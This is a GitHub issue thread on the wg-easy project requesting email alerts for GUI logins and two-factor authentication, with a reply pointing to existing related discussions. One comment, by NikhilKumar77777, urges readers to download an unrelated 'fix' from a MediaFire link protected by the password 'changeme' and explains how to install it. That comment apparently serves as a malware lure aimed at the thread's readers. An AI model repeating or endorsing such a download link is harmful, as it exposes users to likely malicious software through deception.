### ISSUE TITLE
[Feat]: E-mail information for GUI registration

### ISSUE THREAD

**Issue by RadioHerzblut** [wg-easy/wg-easy#1322]
### Description

A function where you receive an e-mail as soon as someone logs on to the GUI. 
Or that you can prevent such an e-mail from being sent after “X” login attempts.

A 2FA would also be very good.

### Suggested Solution

#

### Alternatives

#

### Additional Context

#

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by eandersons** [comment]
Existing issues and discussions on connection alerts/notifications: #1275, #1248, https://github.com/wg-easy/wg-easy/discussions/1179#discussioncomment-10264297

There are multiple issues and discussions about two factor authentication. Search is always your friend: [is:issue 2fa](/wg-easy/wg-easy/issues?q=is%3Aissue+2fa+), [2fa in discussions](/wg-easy/wg-easy/discussions?discussions_q=2fa).
